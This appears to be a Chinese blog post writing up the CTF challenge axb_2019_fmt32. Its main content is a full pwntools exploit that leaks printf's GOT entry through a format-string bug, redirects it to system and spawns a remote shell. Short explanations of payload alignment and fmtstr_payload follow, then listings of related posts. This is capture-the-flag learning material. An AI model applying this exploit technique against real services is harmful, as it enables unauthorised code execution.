关于”axb_2019_fmt32“的记录

最新推荐文章于 2025-11-24 14:30:12 发布
原创 最新推荐文章于 2025-11-24 14:30:12 发布 · 195 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #c语言 #stm32

本文详细解析了如何使用paylaod1构造数据以对齐栈并利用printf_got作为跳转地址,以及paylaod2中的fmtstr_payload技术来修改目标地址,最终实现远程代码执行。涉及的技术包括ELF文件操作、glibc利用和格式化字符串漏洞利用。

首先看exp:

from os import system
from pwn import*
p=remote('node4.buuoj.cn',29623)
elf=ELF('./fmt32')
libc=ELF('./libc-2.23.so')
printf_got=elf.got['printf']
paylaod1= b'a'+p32(printf_got)+ b'mm'+b'%8$s'
p.sendlineafter("me:",paylaod1)
p.recvuntil("mm")
addr_=u32(p.recv(4))
base = addr_-libc.symbols['printf']
system_=base + libc.symbols['system']

paylaod2=b'a'+fmtstr_payload(8,{printf_got:system_},numbwritten=0xa,write_size='byte')
p.sendline(paylaod2)

p.sendline(";/bin/sh\x00")
p.interactive()

值得注意的有这么几点:
1:paylaod1= b'a'+p32(printf_got)+ b'mm'+b'%8$s'这里第一个“a”是为了使数据上的栈对齐,从而使得后面往格式化字符串后第八个参数能够成功被输出。
2:paylaod2=b'a'+fmtstr_payload(8,{printf_got:system_},numbwritten=0xa,write_size='byte')这个fmtstr_payload的功能简单来说就是使偏移所在处的参数首先作为地址,而后将其指向的地方进行修改"{printf_got:system_}"就是在干这件事情。
具体细节请看这位师傅的

axb_2019_fmt32 wp
xia0ji233
06-08 562
title: axb_2019_fmt32 wp date: 2021-6-8 22:00:00 tags: write up format string comments: true categories: ctf pwn 临近期末考试了,终于可以光明正大地水博客了。 最近刚写上格式化字符串的漏洞,这不,他来了。这个题目我做过之后感觉难度还是有的,做出这一题至少对格式化字符串漏洞的利用是有一个较深的理解了的。它综合考察了ret2libc和格式化字符串的任意写,以及对got表的理解。 axb_20.
BUUCTF axb_2019_fmt32(格式化字符串漏洞)
weixin_45441024的博客
01-07 1368
BUUCTF axb_2019_fmt32(格式化字符串漏洞) 我们还是先check一下,发现RELRO是关闭的,那么好,可以修改GOT表了 显而易见这是一个格式化字符串漏洞 ,接下来我们来测试一下偏移量 这里可以看到我们输入了5个a它的ASCII码是61,但是往后进行查看只有四个61,所以我们在之后的构造中就再补上一个字符就对齐了,我们算一下它的偏移量是8,所以只要输入%7$p就可以了。我们就可以利用这个和格式化字符串来泄露出一个函数的地址,来获取libc版本,就能获得system函数的地址了。
axb_2019_fmt32
z1r0的博客
12-20 281
axb_2019_fmt32 查看保护 可以改got的格式化漏洞 测试一下偏移为8,差一个字符,所以payload前面加一个a即可。泄露出libc改printf_got为one_gadget fmtstr_payload中num参数为已经输出的字符个数,这里是0xa; from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r
buu axb_2019_fmt32 1
weixin_74861133的博客
03-24 446
程序大概的逻辑是先使用read函数向s读入最多0x100个字节,然后将s拼接在Repeater:后面再加一个\n后将其存入format里,然后输出format,s的大小为0x239,故不能栈溢出。而printf(format)这存在格式化字符串漏洞。而且该程序开启的只是Partial RELRO保护,所以每个libc函数对应的GOT表项是可以被修改的。
[BUUCTF]PWN——axb_2019_fmt32
mcmuyanga的博客
11-19 2238
axb_2019_fmt32 附件 步骤: 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况 32位ida载入 alarm(),是闹钟函数,主要功能是设置信号传送闹钟,即用来设置信号SIGALRM在经过参数seconds秒数后发送给目前的进程。如果未设置信号SIGALARM的处理函数,那么alarm()默认处理终止进程 25行,明显的格式化字符串漏洞 这题没有后门函数,也没有系统函数,要用格式化字符串泄露出某个libc函数,来获得libc基址 s 和 format 两个参数
BUUCTF axb_2019_fmt32
BengDouLove的博客
04-16 1683
主程序就是这样的,能看到有一个printf的格式化字符串漏洞 sprintf 相当于把参数替换了之后的格式化字符串送入了第一个参数,也就是format 首先,没有后门也没有系统函数,要用格式化字符串泄露出牟哥libc函数,来获得libc基址 然后,仔细算一下 s 和 format 两个参数,都没有溢出,,也没有函数能写进got表,,所以还是再次利用格式化字符串漏洞通过%n来写入数据 先看...
BUUCTF axb_2019_fmt32
2401_85052854的博客
03-23 415
现在我来解释一下,numwritten指的是前面printf在fmtstr之前已经输入了多少个字符串,因为传入fromat是用sprintf来格式化输出,来写入format的,所以format里面有”Repeater:“这个字符串,加上前面我们为了更好的接收print_got表,还在payload前面多输入了一个‘a’所以在fmtstr之前输出了10个字符也就是0xa,所以要设置成0xa才可以正常拿到shell。“来分隔开,system里面会识别成“Repeater:/bin/sh”这样的命令,只有加上;
[BUUCTF]PWN——axb_2019_fmt64(64位格式化字符串改got表)
mcmuyanga的博客
01-27 3295
axb_2019_fmt64 附件 步骤: 例行检查,64位程序,只开启了nx保护 本地运行看一下,可以一直输入 64位ida打开 跟axb_2019_fmt32差不多,所以还是再次利用格式化字符串漏洞通过%n来写入数据 利用过程 首先找一下偏移,偏移为8 找到偏移后我们就可以泄露libc,计算system和bin/sh了 一开始打算跟fmt32一样来泄露libcpayload = p64(puts_got)+"%08$s",失败了,动调发现被/x00截断了,64位都有这个情况,关于64位格式
[BUUCTF]PWN——axb_2019_brop64
mcmuyanga的博客
01-21 1219
axb_2019_brop64 附件 步骤: 例行检查,64位程序,开启了nx 本地试运行一下,看看大概的情况 64位ida载入,第8行的read,明显的溢出漏洞 采用常规的ret2libc的方法 64位传参,要用到寄存器,先找个pop rdi 先是常规的泄露libc p.recvuntil('Please tell me:') payload='a'*(0xd0+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main) p.sendline(p
axb_2019_heap详解
像初雪一样自由洒落
04-25 779
关于axb_2019_heap的详解 参考:buuctf axb_2019_heap 程序流程 banner:存在格式化字符串漏洞,可以泄漏栈上的信息 add:根据idx创建size(大于0x80)大小的内容为content的块 块指针和块大小存放在一个全局变量note中 delete:释放的很干净,没有uaf edit:存在off by one get_input(*((_QWORD *)&note + 2 * v1), *((_DWORD *)&note + 4 *.
BUUCTF【axb_2019_fmt32
weixin_51055545的博客
04-25 2353
例行检查 是开 了部分relro,可以改写got表,然后栈不可执行不, IDA分析 很简单的一个程序,会先初始化一些后续要用到的栈空间,然后让我们输入,字节数大小会有限制,然后再对我们的输入做一个长度判断,长度符合的话就会调用printf()函数,存在格式化字符串漏洞,程序里没有system,binsh字符串,我们这里就要先leak出地址,然后返回system即可,观察程序不难发现,我们无法溢出去控制返回地址,然而我们可以去改 某一函数的got表地址为system,从而去get shell,通过分析,s
axb_2019_fmt32fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’))
weixin_61283545的博客
06-15 285
fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’) 第一个参数表示格式化字符串的偏移 第二个参数表示需要利用%n写入的数据,采用字典形式,我们要将printf的GOT数据改为system函数地址,就写成{printfGOT:systemAddress}; 第三个参数表示已经输出的字符个数 第四个参数表示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hhn
BUUCTF axb_2019_fmt32 & fmt64
zwb2603096342的博客
07-17 1877
格式化字符串漏洞,fmt32fmt64位
Linux---进程概念(一)——冯诺依曼体系、操作系统、进程、PCB的概念讲解
2401_88465894的博客
11-22 837
本文系统阐述了计算机系统的核心概念。首先介绍了冯诺依曼体系结构,包括五大组件(输入设备、存储器、运算器、控制器、输出设备)及其协作关系,重点解释了内存作为CPU与磁盘间缓冲的重要性。其次深入剖析了操作系统的本质,即通过"先描述再组织"的方式管理软硬件资源,将管理对象抽象为数据结构进行操作。然后详细讲解了进程概念,指出进程由内存中的程序代码/数据和PCB(进程控制块)共同构成,并阐述了进程调度中上下文切换的机制。最后说明了进程标识符的获取方式,强调用户程序必须通过系统调用访问内核数据结构。
使用 nethogs 和 nload 进行 Linux 网络监控
Zsr1023的博客
11-22 120
特性nethogsnload监控对象进程网络接口核心问题谁在占用带宽流量总体多大,趋势如何优势精确定位到问题进程直观显示总体流量和速率变化关系微观,深入进程内部宏观,把握整体状况。
Linux】make 与 makefile 实现自动化构建
L_0907的博客
11-24 471
本篇文章主要介绍 Linux 中 make 工具与 makefile 来实现自动化构建
Linux 网络基础】网络通信中的组播与广播:基础概念、原理、抓包与应用
最新发布
love131452098的博客
11-24 879
摘要: 组播(Multicast)和广播(Broadcast)是网络通信中两种重要的数据传输机制。组播面向特定订阅组(IPv4 224.0.0.0/4,IPv6 ff00::/8),通过IGMP/PIM协议实现成员管理和路由分发,适用于视频会议、股票行情推送等场景;广播则在同一二层域内泛洪(MAC ff:ff:ff:ff:ff:ff),用于ARP、DHCP等协议。关键配置包括交换机IGMP Snooping、路由器PIM-SSM/Storm Control,并需注意TTL、防火墙策略。常见问题包括组播丢包(
{"count": "AXB_MTWM_CALL_FINISH_RECORD_INFO", "query": {"result": "0", "baselineTime": {"$gte": 1740758400000, "$lt": 1740844800000}}}, 变成mongo查询语句
03-13
假设集合名称为 `AXB_MTWM_CALL_FINISH_RECORD_INFO`,查询条件如下所示: ```javascript { "result": "0", "baselineTime": { "$gte": ISODate("2025-01-28T00:00:00Z"), "$lt": ISODate("2025-01-29T00:00:00Z...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值